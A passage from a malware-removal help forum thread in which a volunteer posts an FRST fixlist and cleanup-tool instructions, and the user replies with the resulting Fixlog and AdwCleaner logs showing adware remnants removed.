    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    SearchScopes: HKLM -> DefaultScope value is missing
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
    FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
    C:\Users\Kym\IP_Log_Data.js
    C:\Users\Kym\Network_Meter_Data.js
    C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
    C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
    C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
    C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
    C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
    C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
    C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
    C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
    CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
    Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
    Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
    Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
    Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
    Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
    Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
    Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
    Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
    Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
    Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
    Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
    Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
    ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
    AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
    EmptyTemp:
    End
    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f

    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Open FRST/FRST64 and press the > Fix < button just once and wait.
    If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
    When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

    ~~~~~~~~~~~~~~~~~~~~~~~~

    AdwCleaner
    • Please download AdwCleaner and save the file to your Desktop.
    • Right-Click AdwCleaner.exe and select Run as administrator to run the programme.
    • Follow the prompts.
    • Click Scan.
    • Upon completion, click Report. A log (AdwCleaner[SX].txt) will open. Briefly check the log for anything you know to be legitimate.
    • Ensure anything you know to be legitimate does not have a checkmark, and click Clean.
    • Follow the prompts and allow your computer to reboot.
    • After rebooting, a log (AdwCleaner[SX].txt) will open. Copy the contents of the log and paste in your next reply.

    -- File and registry key backups are made for anything removed using this tool. Should a legitimate entry be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



    Please download Junkware Removal Tool
    or from here http://downloads.malwarebytes.org/file/jrt
    to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.


    ~~~~~~~~~~

    Download CKScanner by askey127 from HERE
    Important - Save it to your desktop.
    Doubleclick CKScanner.exe and click Search For Files.
    After a very short time, when the cursor hourglass disappears, click Save List To File.
    A message box will verify the file saved.
    Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~``
    Download Malwarebytes' Anti-Malware TO YOUR DESKTOP


    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"







    • On the Dashboard click on Update Now
    • Go to the Setting Tab
    • Under Setting go to Detection and Protection
    • Under PUP and PUM make sure both are set to show Treat Detections as Malware
    • Go to Advanced setting and make sure Automatically Quarantine Detected Items is checked
    • Then on the Dashboard click on Scan
    • Make sure to select THREAT SCAN
    • Then click on Scan


    After the restart once you are back at your desktop, open MBAM once more.
    Click on the History tab > Application Logs.
    Double click on the scan log which shows the Date and time of the scan just performed.
    Click 'Copy to Clipboard'
    Paste the contents of the clipboard into your reply
    ~~~~~~~~~~~~~~~~~~~``
    please post
    Fixlog.txt
    AdwCleaner[CX].txt
    JRT.txt
    CKFiles.txt
    Malwarebytes' Anti-Malware log
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.

  6. #6
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Post FixLog, AdwCleaner[CX], JRT, CKFiles, Malwarebytes' Anti-Malware Log

    Fix result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
    Ran by Kym (2016-03-01 12:19:19) Run:1
    Running from C:\Users\Kym\Desktop
    Loaded Profiles: Kym (Available Profiles: Kym)
    Boot Mode: Normal
    ==============================================

    fixlist content:
    *****************
    start
    CreateRestorePoint:
    CloseProcesses:
    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    SearchScopes: HKLM -> DefaultScope value is missing
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
    FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
    C:\Users\Kym\IP_Log_Data.js
    C:\Users\Kym\Network_Meter_Data.js
    C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
    C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
    C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
    C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
    C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
    C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
    C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
    C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
    CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
    Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
    Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
    Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
    Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
    Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
    Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
    Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
    Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
    Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
    Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
    Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
    Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
    ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
    AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
    EmptyTemp:
    End
    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f

    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    *****************

    Restore point was successfully created.
    Processes closed successfully.
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1" => key removed successfully
    "HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2" => key removed successfully
    "HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3" => key removed successfully
    "HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4" => key removed successfully
    "HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5" => key removed successfully
    "HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay" => key removed successfully
    HKCR\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => key not found.
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}" => key removed successfully
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}" => key removed successfully
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}" => key removed successfully
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}" => key removed successfully
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}" => key removed successfully
    HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
    "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c4e7ab80-82fd-49d4-801d-669cc0a2392a}" => key removed successfully
    HKCR\Wow6432Node\CLSID\{c4e7ab80-82fd-49d4-801d-669cc0a2392a} => key not found.
    "HKLM\Software\Wow6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin" => key removed successfully
    C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => not found.
    C:\Users\Kym\IP_Log_Data.js => moved successfully
    C:\Users\Kym\Network_Meter_Data.js => moved successfully
    C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\readSTILog.dll => moved successfully
    C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\tmp5300.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe => moved successfully
    "HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0670C04C-B47A-469A-BABD-11885BDDC6F8}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0670C04C-B47A-469A-BABD-11885BDDC6F8}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5}" => key removed successfully
    C:\WINDOWS\System32\Tasks\LaunchSignup => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchSignup" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1EB27F80-D69B-4285-8431-E37E2A44624A}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EB27F80-D69B-4285-8431-E37E2A44624A}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{23C32510-6B84-4F00-B6A2-A3556CA995C0}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23C32510-6B84-4F00-B6A2-A3556CA995C0}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2425DF79-2B81-4356-8999-0E846F585C3E}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2425DF79-2B81-4356-8999-0E846F585C3E}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3405AE0C-9596-4F8A-B29D-FDD7C18CB80B}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3405AE0C-9596-4F8A-B29D-FDD7C18CB80B}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D034A175-EFC9-4CF2-A88F-697EA1808E3E}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D034A175-EFC9-4CF2-A88F-697EA1808E3E}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EC1A0053-4233-4A19-B33C-29FB18854840}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC1A0053-4233-4A19-B33C-29FB18854840}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F260FB74-77B4-4085-8A55-DE82940B9EC6}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F260FB74-77B4-4085-8A55-DE82940B9EC6}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB4D8425-9FA5-4EB8-8614-99CAFB66A562}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB4D8425-9FA5-4EB8-8614-99CAFB66A562}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
    C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Shortcut argument removed successfully.
    C:\Users\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
    C:\Users\Kym\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
    C:\Users\Public\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.

    ========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

    The operation completed successfully.



    ========= End of Reg: =========


    ========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

    The operation completed successfully.



    ========= End of Reg: =========


    ========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

    The operation completed successfully.



    ========= End of Reg: =========


    ========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

    The operation completed successfully.



    ========= End of Reg: =========

    EmptyTemp: => 4 GB temporary data Removed.


    The system needed a reboot.

    ==== End of Fixlog 12:20:13 ====

    # AdwCleaner v5.037 - Logfile created 01/03/2016 at 12:31:36
    # Updated 28/02/2016 by Xplode
    # Database : 2016-02-28.2 [Server]
    # Operating system : Windows 10 Home (x64)
    # Username : Kym - KYM-PC
    # Running from : C:\Users\Kym\Desktop\AdwCleaner.exe
    # Option : Clean
    # Support : http://toolslib.net/forum

    ***** [ Services ] *****


    ***** [ Folders ] *****

    [-] Folder Deleted : C:\ProgramData\AppVerifier
    [-] Folder Deleted : C:\ProgramData\0342bcb1-0de3-0
    [-] Folder Deleted : C:\ProgramData\0342bcb1-60e1-0
    [-] Folder Deleted : C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
    [-] Folder Deleted : C:\ProgramData\3af26a8e-3475-0
    [-] Folder Deleted : C:\ProgramData\3af26a8e-45f1-1
    [-] Folder Deleted : C:\ProgramData\3c355888
    [-] Folder Deleted : C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
    [-] Folder Deleted : C:\ProgramData\{0b5d3910-112c-1}
    [-] Folder Deleted : C:\ProgramData\{21b5474a-312c-0}
    [-] Folder Deleted : C:\Users\Kym\AppData\Roaming\EasyFileOpener

    ***** [ Files ] *****

    [-] File Deleted : C:\appverifier.txt
    [-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_malwarebytes-anti-malware.en.softonic.com_0.localstorage
    [-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_malwarebytes-anti-malware.en.softonic.com_0.localstorage-journal
    [-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nps.pastaleads.com_0.localstorage
    [-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nps.pastaleads.com_0.localstorage-journal
    [-] File Deleted : C:\WINDOWS\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
    [-] File Deleted : C:\WINDOWS\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb

    ***** [ DLLs ] *****


    ***** [ Shortcuts ] *****


    ***** [ Scheduled tasks ] *****

    [-] Task Deleted : {9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D}

    ***** [ Registry ] *****

    [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c355888}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{C007DADD-132A-624C-088E-59EE6CF0711F}
